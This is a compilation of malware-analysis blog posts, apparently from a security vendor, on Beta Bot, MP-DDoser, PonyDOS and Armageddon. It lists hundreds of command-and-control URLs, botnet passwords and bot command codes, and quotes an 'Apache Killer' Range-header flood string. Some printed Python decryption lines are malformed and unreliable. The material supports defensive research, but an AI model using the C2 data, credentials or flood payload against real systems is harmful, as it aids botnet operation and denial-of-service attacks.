Global_config_struct points to a block of encrypted data in the .rdata section. In version 1.0.2.5 of the code the length of a configuration is 0x2ace, in version 1.5 this has shrunk to 0xd46.

Configuration Structure Layout

Once decrypted, the configuration file contains a header with a unique ID of the purchaser of the bot, a couple of strings that are used for the rootkit install, and 16 CnC blocks.

Each CnC block contains a domain, path, and port, an option specifying if SSL should be used, the number of attempts that should be made, and the keys used for encrypting the communication. There are also checksum values, but I don’t plan to discuss them as to not make the creation of a builder too easy.

Configuration Extraction Tool

Located on Github is a script created to pull the encrypted configuration out of binaries or memory dumps. It works with version 1.0.2.5 and version 1.5 of Beta Bot using a couple of techniques to find the configuration. If the sample is packed with a packer that obfuscates either the .data or .rdata sections this tool will not work on the raw sample and memory dumps will have to be used.

For creating memory dumps, it’s useful to automatically create a dump on calls to LeaveCriticalSection. Beta Bot creates multiple threads and uses critical sections for synchronization. LeaveCriticalSection is called at the end of the decryption code.

r3shl4k1sh posted instructions can also be used to manually find the configuration data.

When the script finds a valid configuration it will output the information in the form:

output

Script search techniques:

Offset Search

First, the scripts search a small area of the .data and .rdata sections for valid key and configurations. This has shown to work well in our testing and is very fast, generally taking less than a second.

Bruteforce Search

Second, the script will create an index of all possible 6 byte sequences and search every possible key. The index requires memory of around 220 times the size of the file, and the amount of time required to search is also much larger. Searching a 1 meg file requires about 20 seconds to process.

Results

The script was run on available samples and 387 configs were found. The complete list with encryption keys is available here.

Owner URL
1337haxxor http://my-execute-1441.pw/index/order.php
136590144 http://virus-check.org/update/order.php
136590144 http://akamai-update.com/update/order.php
1427399 http://strike-file-hosting.us/b/order.php
1427399 http://gethostingfast.info/b/order.php
210259 http://beta.uandmearevideos1.com/direct/mail/order.php
210259 http://beta.thegamejuststarted15.com/direct/mail/order.php
210259 http://beta.thegamejuststarted12.com/direct/mail/order.php
210259 http://beta.thegamejuststarted10.com/direct/mail/order.php
210259 http://beta.mypaintdress.com/direct/mail/order.php
210259 http://beta.uandmearevideos2.com/direct/mail/order.php
210259 http://beta.stop2teaseme.com/direct/mail/order.php
210259 http://beta.pixartzone.com/direct/mail/order.php
210259 http://beta.dietmydart.com/direct/mail/order.php
210259 http://beta.worldwipeme.com/direct/mail/order.php
210259 http://beta.thegamejuststarted11.com/direct/mail/order.php
210259 http://beta.thegamejuststarted13.com/direct/mail/order.php
210259 http://beta.thegamejuststarted14.com/direct/mail/order.php
792476 http://7obby.com/beta/order.php
792476 http://betabot.zapto.org/beta/order.php
792476 http://betabu.zapto.org/beta/order.php
Deamons http://www.evaluatedservices.biz/services/order.php
Deamons http://evaluatedservices.no-ip.org/services/order.php
Deamons http://gamerslaunch.no-ip.org/services/order.php
Eleventy One http://pooo-network.ru/register/order.php
Eleventy One http://poooman.tk/register/order.php
Eleventy One http://CUCUMBERS.TK/register/order.php
Eleventy One http://SAMSUNGGALAXYS3.TK/register/order.php
KWA http://haveityourway.pw/members/order.php
KWA http://thebestway42.pw/members/order.php
KWA http://itsoktohaveityourway.com/members/order.php
KWA http://losmejoresburgars1.com/members/order.php
Marvid http://betabros.in/beta/order.php
TSWR http://kankarmz.ru/Duf67/H8938_827.php
TSWR http://u023sjasj.net/Duf67/H8938_827.php
TSWR http://iodijsakj.net/Duf67/H8938_827.php
antonstrato http://terraload.pw/bb/order.php
antonstrato http://trakd.ws/bb/order.php
antonstrato http://trakd.biz/bb/order.php
antonstrato http://trakd.ru/bb/order.php
bd http://nicolozzi.com/order.php
bd http://marlinators.com/order.php
bd http://aberdolli.com/order.php
bd http://markupont.com/order.php
bd http://coloranders.com/order.php
bdatblackhat http://dietfitnessliving.com:8088/order.php
bdatblackhat http://strandotline.net:8088/order.php
bdatblackhat http://abilfindgone.net:8088/order.php
bdatblackhat http://morgentallen.com:8088/order.php
bdatblackhat http://langlots.com:8088/order.php
blacklabel http://premium-load.com/primetime/order.php
blacklabel http://weed-service.biz/primetime/order.php
blacklabel http://premium-load.biz/primetime/order.php
blacklabel http://load1337.biz/primetime/order.php
blacklabel http://loads1337.biz/primetime/order.php
blacklabel http://weed-service.biz/primetime/order.php
blacklabel http://deception.cc/primetime/order.php
blacklabel http://fullstream.in/primetime/order.php
blacklabel http://mystream.in/primetime/order.php
blacklabel http://premium-movie.ru/primetime/order.php
bmblender33 http://assler.hfgfr56745fg.com/cakes/sale.php
boog http://1rb4hiu.name/path/order.php
boog http://2snrgk3.name/path/order.php
boog http://ekyn6w.name/path/order.php
boog http://ylen5d87.biz/path/order.php
boog http://y4d5g1v.biz/path/order.php
boog http://8y14gf5s.biz/path/order.php
caerus http://knwns.de/bst/order.php
caerus http://dspas.de/bst/order.php
caerus http://oscos.de/bst/order.php
cobraxxx http://firecrypt.net/BetaBot/order.php
cobraxxx http://rankedgaming.co/BetaBot/order.php
cobraxxx http://iphone5-giveaways.com/BetaBot/order.php
d8902659 http://n18b7273u1j.in/M_jsh1/order.php
d8902659 http://b19jdn167t.in/M_jsh1/order.php
dan http://umadais.pw/a/order.php
dan http://yyaammppuu.pw/a/order.php
dan http://blamaldo.pw/a/order.php
depojones http://uy56icv89178.net/warm/order.php
detodo http://medievaltime.rhodes-rhodes.com/webcalendar/revenew.php
detodo http://vacation.eurotrip-06.com/webcalendar/revenew.php
detodo http://eurotrip.e-greecetravel.com/webcalendar/revenew.php
detodo http://playgames.cyprusleague.com/webcalendar/revenew.php
euroroids http://steroids-buy-anabolic.com/order.php
h4r3 http://dev-prism.su/prism/return.php
h4r3 http://lavidalocapd.biz/~.chica/analytics.php
h4r3 http://tktlamifa.co.in/~.alah/analytics.php
h4r3 http://whatdaaafuckinyourhead.biz/~.zbra/analytics.php
h4r3 http://x42v72.biz/~.nazi/analytics.php
h4r3 http://zbraaadanstfesse.org/~.poto/analytics.php
h4r3 http://suxme.itsprosolutions.org/~.juif/analytics.php
h4r3 http://suxme.itsprosolutions.org/~.boobi/analytics.php
h4r3 http://allahwouakbaaahhh.co.in/~.boby/analytics.php
h4r3 http://namesbeyond.ru/dns/return.php
h4r3 http://amemeuch.biz/~.xixu/analytics.php
h4r3 http://justinbkt.su/ppl/return.php
h4r3 http://betazbraxxx.co.in/~.oula/analytics.php
h4r3 http://gangbangonexposedbotnet.su/love/return.php
h4r3 http://hackattaksuceuse.biz/~.homo/analytics.php
h4r3 http://hacktipucov2.org/~.xixu/analytics.php
h4r3 http://jesaispastropkoimettre.org/~.jesus/analytics.php
h4r3 http://laradimcrelou.co.in/~.sarko/analytics.php
h4r3 http://thebossinfly.org/~.xixu/analytics.php
infin219235 http://jkdef6.ws/papka/order.php
infin219235 http://jkdef8.ws/papka/order.php
infin219235 http://jkdef6.ws/papka/order.php
infin219235 http://jkdef8.ws/papka/order.php
infin219235 http://jkdef7.ws/papka/order.php
infin219235 http://jkdef10.ru/papka/order.php
infin219235 http://jkdef11.ru/papka/order.php
infin219235 http://jkdef12.ru/papka/order.php
infinity http://betabros.in/b/order.php
infinity http://jkdef9.ws/papka/order.php
infinity http://betabros.asia/b/order.php
infinity http://jkdef8.ws/papka/order.php
infinity http://jkdef7.ws/papka/order.php
infinity http://jkdef6.ws/papka/order.php
jmr21900f8 http://euclid.es/147/order.php
juancarlos http://s5.6d6f6e65797072696e746572.com/wp-admin/order.php
juancarlos http://wyomiriding928.com/wp-admin/order.php
juancarlos http://portal.anzima.eu/wp-admin/order.php
juancarlos http://ripraktec147.com/wp-admin/order.php
juancarlos http://portal.jaymad.net/wp-admin/order.php
juancarlos http://youdbeproud228.com/wp-admin/order.php
juancarlos http://wyomiriding928.com/wp-admin/order.php
kakaatthesec http://obession.co.ua/wordpress/images/order.php
kakaatthesec http://harmonia2011.info/wordpress/images/order.php
kakaatthesec http://fasdkj234fffdcsfsdac.info/wordpress/images/order.php
kakaatthesec http://ringostars.info/wordpress/images/order.php
kakaatthesec http://asdffdssfadtged3432ff.info/wordpress/images/order.php
kakaatthesec http://dfsajkhkjfhdsjfsdf32fdscc.info/wordpress/images/order.php
kakaatthesec http://jkfadshjsmafweior32fsyfsdc.info/wordpress/images/order.php
kakaatthesec http://oppnetter.biz.ua/wordpress/images/order.php
kakaatthesec http://hot.zlatkotrpkovski.net/wordpress/images/order.php
kakaatthesec http://oppspeedy.co.ua/wordpress/images/order.php
kakaatthesec http://tommyslav.name/wordpress/images/order.php
kakaatthesec http://oppnetspeed.co.ua/wordpress/images/order.php
kakaatthesec http://polen.pelota.so/wordpress/images/order.php
kakaatthesec http://antczakphotos.info/wordpress/images/order.php
kakaatthesec http://digues.info/wordpress/images/order.php
katokiyomasa http://www4.cdljussarago.com.br/js/dojo/order.php
katokiyomasa http://www4.tamareirashotelmg.com.br/js/dojo/order.php
kulira2 http://m0ap9s1n0.com/0r/r0/ba/order.php
kulira2 http://x01rakmtp.com/0r/r0/ba/order.php
kulira2 http://uj8kml21z.com/0r/r0/ba/order.php
lavnesh http://freegamebox.us/codeserver/order.php
lavnesh http://lpa4u.in/radioserver/order.php
lavnesh http://gamingplanet.us/codeserver/order.php
marvid82 http://betabros.in/b/order.php
mr7xa2a http://hackedthe.biz/beta/order.php
mrwhite http://botsworkingnets.net/panel15/order.php
neepro http://wutido.su/manager/order.php
neepro http://wutudo.su/manager/order.php
nicksasa http://imafaggot.pw/service/order.php
nicksasa http://winblowservice.hopto.org/service/order.php
nicksasa http://imtheop.redirectme.net/service/order.php
prince896589 http://derp.ws/img/order.php
r3dspid3r http://securityspecialiastinc.in/phpmiadmin/order.php
r3dspid3r http://securityspecialiastinc.in:7777/phpmiadmin/order.php
ryanc http://imgay.ddos.cat/h/order.php
ryanc http://imgay.ddos.es/h/order.php
ryanc http://imgay.theswat.net/h/order.php
scarpa http://blackcross.me/burocracia/inicio.php
scarpa http://branigan.me/burocracia/inicio.php
shrooms http://msn.3utilities.com:81/help/order.php
shrooms http://videoparadise.biz:81/help/order.php
shrooms http://kittybook.biz:81/help/order.php
shrooms http://msn1981.3utilities.com:81/help/order.php
shrooms http://DATES4YOU.TK:81/help/order.php
solid006 http://dirtybagmcgee.com/dirty/order.php
solid006 http://silverxchagr.com/juice/order.php
solid006 http://shoremasse.mobi/popp/order.php
solid006 http://bicycletrainers.info/wheellock/order.php
solid006 http://goldlimiter.biz/hum/order.php
solid006 http://royalgcs.biz/slam/order.php
solid006 http://womenhealthbody.pw/diet/order.php
solid006 http://gaspaces.com/cats/order.php
solid006 http://dealthos.pw/crap/order.php
solid006 http://diccwadz.pw/slap/order.php
solid006 http://jeanmagik.org/hats/order.php
solid006 http://dreambasqet.biz/sill/order.php
solid006 http://prtctrl.us/popp/order.php
spankdahobo http://alfalocagames.in/forums/order.php
spankdahobo http://whyapplemac.com/forums/order.php
spankdahobo http://nosurvivor.com/forums/order.php
sphinx http://yuant.org/sor/order.php
sphinx http://rankpae.info/sor/order.php
sphinx http://yuant.org/sor/order.php
ss9s9s9s4d http://securityspecialiastinc.in/phpmiadmin/order.php
stringback http://fuckencio.com/wordpress/order.php
stringback http://clarocontigosiempre.mobi/wordpress/order.php
stringback http://clarocontigosiempre.us/wordpress/order.php
the sky daddy http://sentryme.com/order.php
the sky daddy http://smokelessbooter.tk/bronk/order.php
the sky daddy http://stayattentive.com/order.php
the sky daddy http://watchonlinecams.com/bronk/order.php
the sky daddy http://ssh-products.com/bronk/order.php
the sky daddy http://fudfiles.com/bronk/order.php
the sky daddy http://theprofitnet.com/bronk/order.php
the sky daddy http://1337hackers.com/bronk/order.php
the sky daddy http://cash-networks.com/bronk/order.php
thesilence http://wrightfeldhusen.info/beta/order.php
thesilence http://futureofwebdesign.info/beta/order.php
thesilence http://vdezignstudio.info/beta/order.php
thesilence http://waterworks2.info/beta/order.php
thesilence http://waterworks2.com/beta/order.php
thesilence http://nordkupp1.info/beta/order.php
thesilence http://circusbum.info/beta/order.php
thesilence http://novflex.info/beta/order.php
thesilence http://akwebdesigner.info/beta/order.php
thesilence http://websachee.info/beta/order.php
thesilence http://tincorporated.info/beta/order.php
thesilence http://thetwenty.info/beta/order.php
thesilence http://swedishseasons.info/beta/order.php
thesilence http://lommebags.info/beta/order.php
thesilence http://andywilsonfs.info/beta/order.php
thesilence http://ghostgames1.info/beta/order.php
toxbotatjab http://kemasonlogs.com/admin/order.php
toxbotatjab http://milleniumforum.net/system/order.php
toxbotatjab http://skywalke.com/forum/order.php
toxbotatjab http://letmein2.com/foro/order.php
toxbotatjab http://milleniumboard.tk/logs/order.php
toxbotatjab http://tecnoservice.tk/test/order.php
untraceable http://adobe-update.com/flash_player/order.php
untraceable http://auto-update.net/flash_player/order.php
volwy http://Tr0j3n18.info/order.php
volwy http://ASKFMHILELERI.COM/order.php
volwy http://KINGFB.COM/order.php
volwy http://MO843TI943ZT7842R23R23.COM/order.php
xafx http://srv1.su/b/order.php
xversial http://seattleschools.co/beta/order.php
xversial http://:modbrandom.net/order.php
xversial http://sxyza.dyndns.ws/beta/order.php
xversial http://shatteredwow.com/beta/order.php
xversial http://cnetwork.eltsa.com/beta/order.php
xversial http://thex-net.com/pnetb1z/order.php
zaber http://beta.uandmearevideos1.com/direct/mail/order.php
zaber http://beta.thegamejuststarted15.com/direct/mail/order.php
zaber http://beta.thegamejuststarted12.com/direct/mail/order.php
zaber http://beta.thegamejuststarted10.com/direct/mail/order.php
zaber http://beta.mypaintdress.com/direct/mail/order.php
zaber http://beta.uandmearevideos2.com/direct/mail/order.php
zaber http://beta.stop2teaseme.com/direct/mail/order.php
zaber http://beta.pixartzone.com/direct/mail/order.php
zaber http://beta.dietmydart.com/direct/mail/order.php
zaber http://beta.worldwipeme.com/direct/mail/order.php
zaber http://beta.thegamejuststarted11.com/direct/mail/order.php
zaber http://beta.thegamejuststarted13.com/direct/mail/order.php
zaber http://beta.thegamejuststarted14.com/direct/mail/order.php
zero byte http://www.w0000t.com/000003/order.php
zero byte http://www.modmarkgoldshop.com/000003/order.php
zero byte http://www.mogains.com/000003/order.php
zerod30_1111 http://www.w0000t.com/000003/order.php
zerod30_1111 http://www.modmarkgoldshop.com/000003/order.php
zerod30_1111 http://www.mogains.com/000003/order.php
e4d56fhhu http://h1gh.to/content/design/in/images/ads/banner/order.php
e4d56fhhu http://vbt-one.biz/content/design/in/images/ads/banner/order.php
e4d56fhhu http://chf-dfgsdfgplace.net/content/design/in/images/ads/banner/order.php
e4d56fhhu http://ded-rrwqwzjzjris.com/content/design/in/images/ads/banner/order.php
e4d56fhhu http://seb-api.net/content/design/in/images/ads/banner/order.php
e4d56fhhu http://swrgfderthgikhoplk.info/content/design/in/images/ads/banner/order.php
e4d56fhhu http://cf-fgdgwdvbs.com/content/design/in/images/ads/banner/order.php
e4d56fhhu http://greahthrhdhse.info/content/design/in/images/ads/banner/order.php
e4d56fhhu http://sab-rehrgfgdfg.org/content/design/in/images/ads/banner/order.php
caerus http://knwns.de/bst/order.php
caerus http://dspas.de/bst/order.php
caerus http://oscos.de/bst/order.php

ASERT MindshaRE: Finding Byte Strings using IDAPython

By: Jason Jones -

In the spirit of the old ZDI MindshaRE posts, ASERT has decided to share some of our malware reversing techniques from time-to-time on the blog and also re-use the MindshaRE moniker. The first post will focus on a major annoyance that many pieces of malware use to avoid strings analysis: setting strings byte-by-byte either directly on the stack or in local variables. The scripts detailed in this post are available in the reversing repository at the Arbor ASERT github.

Example of Malware Using Byte Strings

Figure 1: Example of Malware Using Byte Strings

This is a technique seen in Gh0st RAT and its variants to “hide” the magic values used in the phone-home data structure and has also been heavily used in many Delphi-based malwares through various “string protection” libraries. An example of one such malware can be seen in Figure 1. We have also seen similar code that will set one character into an 8-bit register and then inter-mix that with direct byte values to add further obfuscation.

Finding and building these strings is a pain to do, but is possible using some IDA scripting. I’ve been working on an IDA plugin to do exactly that and recently got the script to a point where I felt it would be useful to share with others.

Overview of the Code

IDAPython makes it fairly easy to step through every function using the Functions() call that returns an iterator that will give you the address of every function and then passing that start address to get_func(). This returns a structure that has .startEA and .endEA members that you can pass to the Heads() function to get an iterative list of all the instruction addresses per function. Unless the string is pushed directly to the stack, it will likely be set using a mov instruction and a call to GetMnem will give the Mnemonic for the instruction being used. This is illustrated in the code snippet below:

for f in Functions():
    func = get_func(f)
    for head in Heads(func.startEA,func.endEA):
        if GetMnem(head) == "mov":

I then used GetOpnd to make sure that was either marked as a byte ptr or a dereference was happening and that an immediate value (o_imm) was being set and that the value was in the printable ASCII range. To separate out multiple byte strings in the same function, I pull the register value out of the return value from GetOpnd and use the offset returned by GetOperandValue as an index into a tokens dictionary. A tuple of the instruction address and the char are stored with each offset. Once the endEA is reached, we can iterate through consecutive offsets to build each string and have a reference to the starting address. One caveat with doing that is that an offset and register may be re-used inside the same function so a method for detecting that and not overwriting the current values is also needed (but not yet implemented in my script :)). The other thing I have seen malware do is move one character into an 8-bit register and then use that to set character values, but this is unimplemented in by script and will be the next feature I plan to add.

if (GetOpnd(head,0).startswith('byte ptr') or 
   GetOpnd(head,0).startswith('[e')) and 
   GetOpType(head,1) == o_imm and 
   GetOperandValue(head,1) >= 0x20 and 
   GetOperandValue(head,1) <= 0x7f:

    reg = GetOpnd(head,0)
    reg = reg[reg.find('['):]
    if reg.count('+') == 0: offset = 0
    else:
        reg = reg[:reg.find('+')]+']'
        offset = ctypes.c_int32(GetOperandValue(head,0)).value
    if reg not in chr_vals: chr_vals[reg] = {}
    chr_vals[reg][offset] = (head,chr(GetOperandValue(head,1)))

Once all that is done, it should be a snap to reconstruct the strings and shove them into a QTableWidget and make clicking a row jump to the address where the string starts. A screenshot of the current version of the script in action is below:

 

Byte String Viewer Screenshot

Byte String Viewer Screenshot

Planned additions to the script include support for strings pushed onto the stack and optional re-naming / MakeArray calls for local char[] instances.

 

Bonus: Switch Jump Viewer

A little over a year ago I took the Bug Hunting and Analysis 0×65 course from Aaron Portnoy and Zef Cekaj of Exodus Intelligence. One of the scripts we did in the class was write a set of code to find switch statements and print out data around them. I decided to take my script a bit further and create a tree structure organized at the top level by subroutine and then list the switch jumps in each subroutine and then list the cases and location label each case will go to.  I’ve found this script useful for quickly finding command parsing routines in malware. There are still some bugs here and there that I am working out and will keep pushing update to our github.

Switch Jump Viewer Screenshot

Switch Jump Viewer Screenshot

MP-DDoser: A rapidly improving DDoS threat

By: jedwards -

This blog post is the fifth installment in our ongoing series of articles surveying the crypto systems used by different DDoS-capable malware families. Today’s topic is MP-DDoser, also known as “IP-Killer”

As far as we are aware, MP-DDoser was first documented in February 2012 by Arbor analyst Curt Wilson in his pioneering survey of modern DDoS threats. Like many of the malware families we see these days, MP-DDoser is exclusively a DDoS bot; it has no ability to do key-logging, info-stealing, spamming, or other such mayhem. We started seeing the first MP-DDoser samples back in December 2011, which billed themselves as “Version 1.0″. These early versions had a number of serious flaws, such as a completely broken Slowloris attack implementation, and really awful crypto key management. But the latest samples (now up to “Version 1.6″) are much improved; the key management is quite good, and the buggy DDoS attacks are not only fixed, but now include at least one technique (“Apache Killer”) that may be considered reasonably cutting edge.

The full details of our analysis are included in the attached report, but here are the highlights:

In addition to a Slowloris-style attack and various generic flooding capabilities, the newest versions of MP-DDoser support an ApacheKiller-style attack, which is a relatively new (and sophisticated) low-bandwidth technique for inflicting denial-of-service attacks against Apache web servers. It first appeared in the form of a proof-of-concept Perl script in August 2011. Then toward the end of 2011 we saw a version of it incorporated into the Armageddon DDoS bot; however that implementation turned out to be severely flawed. Now, we are seeing it show up in MP-DDoser – and a review of the bot’s assembly code indicates that it does indeed appear to be a fully functional, working implementation of the Apache Killer attack.
The core of the attack involves the sending of a very long Range HTTP header that is intended to bring web servers (especially Apache) to their knees by forcing them to do a great deal of server-side work in response to a comparatively small request. It is therefore one of the more effective low-bandwidth, “asymmetrical” HTTP attacks at the moment.

The complete MP-DDoser command code vocabulary is as follows:

Command Code Function
PP Ping bot, which echoes PP back to C&C
TC Similar to PP, but echoes back with TP
KC Kill bot client process via ExitProcess()
UN Uninstall
BK Scan for IRC, IM, Skype processes
STF Stop all flooding operations
DL Download via URLDownloadToFile() and run   via ShellExecute()   a new malware binary
SFUDP Start UDP Flood
SFHTTP Start HTTP Flood
SFSL Start Slowloris Flood
SFBWD Start “Bandwidth” Flood
SFL7 Start Layer 7 attack
SFARME Start Apache Range Flood (“Apache Killer”)

Besides being armed with some potent DDoS weaponry, MP-DDoser is also interesting because of the multiple layers of encryption it uses for key management in order to secure its network communications. Again, the full details are provided in the attached report, but the high-level summary is as follows:

The malware actually uses a pretty straightforward algorithm for encrypting and decrypting the transmissions sent between bot and C&C server. It modulates the plaintext message with a key string using the XOR operator, but it applies this XOR operation only to the least significant 4 bits of each message byte. The following Python snippet replicates MP-DDoser’s network crypting functionality:

def decrypt_mpddos_comms(msg_text, key_text):
    key_bytes = [ord(key_byte) for key_byte in key_text]
     msg_bytes = [ord(msg_byte) for msg_byte in msg_text]
     len_key = len(key_bytes)
     return ''.join([chr((msg_byte & 0xf0) + 
                    ((msg_byte & 0x0f) ^ (key_bytes[k % len_key] & 0x0f))) 
                    for k, msg_byte in enumerate(msg_bytes)])

The tricky part is finding the key string! In earlier versions of MP-DDoser, circa late 2011, this key string was simply hard-coded into the bot executable in plain text. But since then, MP-DDoser has improved rapidly on the key management front. Now the key string itself is encrypted and stored in an RCDATA resource named MP, along with some other sensitive information such as the hostname and port of the C&C, the botnet ID, etc.:

Furthermore, the algorithm used for decrypting this resource is string is different from the aforementioned algo used for crypting the actual communications. The resource decryption mechanism appears to be a “home brew” algorithm. The details are in the report, but the algorithm can be summarized by the following Python snippet:

def decrypt_mpddos_rsrc(rsrc_crypt, plain_lut):
    accum_A = accum_B = 0
    plain_rsrc = []
    for rsrc_byte in rsrc_crypt:
        next_byte = plain_lut.index(rsrc_byte)
        accum_B = next_byte + (accum_B << 6) accum_A += 6
        if accum_A >= 8:
            accum_A -= 8
            plain_rsrc += [(accum_B >> accum_A)]
            accum_B %= (1 << accum_A)
    return ''.join([chr(dstbyte) for dstbyte in plain_rsrc])

To decrypt the MP resource string, the bot uses a lookup table (“LUT”) that maps ASCII characters to integers for the initial phase of the decryption loop. But even this lookup table is itself encrypted! Fortunately, it is encrypted using the same algorithm used for crypting the network comms, and thus the aforementioned decrypt_mpddos_comms() Python function will handle it. And mercifully, the key string need to decrypt the LUT happens to be stored in plain text in the bot executable. In all the samples that we’ve encountered to date, that key string is: 00FF00FF00FF, but that could easily change in the future.

So in order to decrypt MP-DDos transmissions, one needs to:

1. Decrypt the LUT using decrypt_mpddos_comms();
2. Then use the LUT to decrypt the MP resource via decrypt_mpddos_rsrc();
3. Then pull the comms key from the plain text resource and provide it to decrypt_mpddos_comms() to decrypt the actual network traffic.

The attached diagram illustrates the process:

On top of all that, the bot binary itself is doubly packed using UPX followed by a .Net-based crypter. The author of MP-DDoser has clearly spent some time trying to beef up operational security.

We have put all the pieces together into an “auto-ripper” tool that tears apart a memory dump of each MP-DDoser bot we encounter and extracts the three ingredients needed for traffic decryption (highlighted by yellow ovals in the above diagram) for use in our botnet monitoring operations. Once decrypted, the sensitive MP resource ends up being a pipe-delimited string containing C&C host, C&C port, network comms key, installation mutex, installation filename, botnet ID, etc. For example:

tgm991.no-ip.info|3030|ipkillerpassword|IPK-MPMutex|-1|Not Available|
Windefender.exe|Windefender|IPK-Victim|0|

And here are some representative samples of the comms keys and botnet IDs for various MP-DDoser botnets we’ve seen (all of these C&Cs are currently deceased at the time of writing):

 

C&C Hostname C&C Port

Botnet ID

Crypto Password

108.38.80.106

3178

IPK-Victim

ipkillerpassword

127.0.0.1

19302

IPK-Victim

ipkillerpassword

176.31.114.45

2020

IPK-Victim

ipkillerpassword

192.162.102.192

1337

IPK-Tayran

ipkillerpassword

62.29.106.51

3030

silici

ipkillerpassword

69.14.75.176

3030

IPK-RSTool

hackingrs

biofaction.no-ip.biz

6666

SWAG

cool

biofaction.no-ip.biz

6666

Silent

cool

blackzone.cc

3030

IPK-BZ

ipkillerpassword

boing7898.no-ip.biz

5992

Commander

codeleak

charloservs2.no-ip.biz

87

IPK-Victim

12344321

explorexe.no-ip.biz

3085

Default

94252310dcim15

internetlogger.no-ip.org

8080

IPK-Victim

118118

joshkozman10.no-ip.biz

3030

IPK-Victim3030

josh11463

lockdown420.no-ip.biz

3030

Monk

ipkiller

lockdown420.no-ip.biz

3030

Recover

ipkiller

p3d.no-ip.info

4444

ExploitedJDB

ipkillerpassword

sakiir.no-ip.biz

2020

IPK-Mine   Hacktivisme

lol

stehulme.no-ip.org

5504

IPK-Victim

steveboy7

street.no-ip.biz

3030

IPK-Victim

ipkillerpassword

tgm991.no-ip.info

3030

IPK-Victim

ipkillerpassword

tr9.no-ip.info

3175

Bshade

ipkillerpassword

Applying this information to live MP-DDoser traffic yields transmissions formatted as follows (with some information modified to protect the parameters of our sandbox machines of course):

 Encrypted Bot Phone Home Transmission:
 0x0000 48 47 7e 41 67 65 60 75 68 77 49 3c 2f 33 75 4d   HG~Age`u hwIq Vlg`mrq#
 0x0030 59 50 24 7b 31 3b 7d                              YP${1;}
 Decrypted Transmission:
 AC|Default@1.6|Idle...|Hawkeye@Mash4077|Windows XP x86|

The AC stands for “Add Client”; Default corresponds to the botnet ID, and 1.6 is the MP-DDoser version. The remainder of the phone home message contains the usual information, such as bot status (Idle), and username, computer name, and operating system of the infected machine.

All in all, MP-DDoser uses some of the better key management we have seen. But of course, at the end of the day, every bot has to contain – or be able to generate – its own key string in order to communicate with its C&C, so no matter how many layers of encryption our adversary piles on, they can always be peeled off one by one.

The complete reverse engineering report for this version of MP-DDoser is available here

To summarize, the MP-DDoser code base is clearly being actively developed, and is improving rapidly on both the attack/flooding capability and network crypto fronts. We will keep monitoring this evolving DDoS threat in order to stay one step ahead of it – and use the intel we gather to continue defending our customers.

Not just a one-trick PonyDOS

By: jedwards -

Reversing the crypto used by the PonyDOS attack bot

This blog post is the third installment in our ongoing series of articles exploring the crypto systems commonly found in various DDoS malware families.  In previous articles we covered the reversing of the Armageddon and Khan DDoS bots; today we will cover a new malware family that we are calling Trojan.PonyDOS.  This malware family started showing up on our radar screens late in 2011.  Based on a static analysis of the malware, it seems that PonyDOS bot is yet another example of a bot that is exclusively focused on launching DDoS attacks against victim websites.  During dynamic analysis in a sandbox, we observed one PonyDOS sample phoning home to its C&C, and getting a response back; sadly, the communications were encrypted.  It turns out that PonyDOS uses a relatively complicated encryption mechanism to secure its communications, the reversing of which is discussed in detail in the linked report below.  As described in this report, PonyDOS has quite a few tricks up its sleeve that are designed to make its communications resistant to casual attempts at breaking.

PonyDOS gets its named from the string PNYDOS00 that is embedded within the bot binaries; as discussed in the report, the bot includes this identifying string in the “phone home” messages it sends to its command & control (C&C) server.  In addition, some of the samples also like to install themselves into sub-directories named pny within the infected user’s Application Data directory for example, as the file:

C:Documents and Settings$USERNAMEApplication Datapnypnd.exe

We reversed the malware’s crypto in order to gain a better insight into its behavior.  A complete analysis of the crypto system used by PonyDOS – including a Python implementation of a decryption/encryption module, is available here:

Report:  Not just a one-trick PonyDOS

Breaking the encryption used by our little PonyDOS was instrumental in understanding its various DDoS attack mechanisms, and developing defenses against them.  It turns out that PonyDOS supports the four following different types of attacks supported by PonyDOS:

  • A TCP Connection Flood;
  • An HTTP GET flood that does not attempt to read any response from the target web server;
  • An HTTP GET flood that does read responses from the target web server;
  • An HTTP POST flood;

Of course once we had broken the PonyDOS crypto, we started using our Python script (in encryption mode) to generate fake phone home messages in order to impersonate bots and trick the PonyDOS C&C servers into giving up their current attack orders.  This allows us to monitor PonyDOS botnets and observe attacks.  To date we’ve logged attacks against various target web sites hosted in the United States, Russian, and Luxembourg.  The PonyDOS botmasters seem to favor the GET flood attacks, with almost half (94 out of 192 logged events) of its attacks being specified as attack code 0×01 (GET without server read) or 0×02 (GET with server read).  TCP Connection Floods (code 0×00) and POST floods (code 0×03) were used less frequently as alternate attack types:

This completes the third installment in our ongoing series on breaking the crypto systems used by contemporary DDoS malware families.

It’s 2012 and Armageddon has arrived

By: jedwards -

Breaking Armageddon’s latest and greatest crypto reveals some interesting new functionality

Armageddon is one of several notable Russian malware families that are designed exclusively for DDoS attacks; it has been on our radar screens for some time now. Its primary competitors within the market of Russian DDoS vendors are Dirt Jumper (a.k.a. RussKill), Darkness/Optima (a.k.a. Votwup), and of course BlackEnergy.

We’ve noticed that the Armageddon code base has undergone some relatively rapid evolution lately, and the purpose of this blog post is to report on some of the new functionality we have observed. With this latest release, the bot uses some new crypto protection to hide its features from casual observers; breaking this encryption revealed some interesting goodies…

It turns out that the latest version of Armageddon contains support for a few new flavors of DDoS flooding which have been customized to target certain types of web sites. The names of the commands give some indication of the gist of the attacks: .apacheflood, .vbulletinflood, .phpbbflood, The implementation of the .apacheflood command was of particular interest; it makes use of the following (decrypted) string when formulating its flooding requests:

Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,,5-1299,5-1300

This string represents an optional HTTP header that turns out to be included in DDoS flooding requests generated by the bot when performing an .apacheflood attack; this string, along with another encrypted Armageddon string, Accept-Encoding: gzip, have been associated with the so-called “Kill Apache” attack, a type of highly assymetric low-bandwidth DDoS technique that has emerged relatively recently.

In a nutshell, the Kill Apache attack abuses the HTTP protocol by requesting that the target web server return the requested URL content in a huge number of individual chunks, or byte ranges. This can cause a surprisingly heavy load on the target server; in particular, certain versions of the Apache HTTP server handle such requests extremely poorly and in some cases can be brought to their knees by a single attacking client. To our knowledge, this is the first time that the Kill Apache attack has reared its ugly head in actual botnet code in the wild, as opposed to proof-of-concept and/or standalone attack tools.

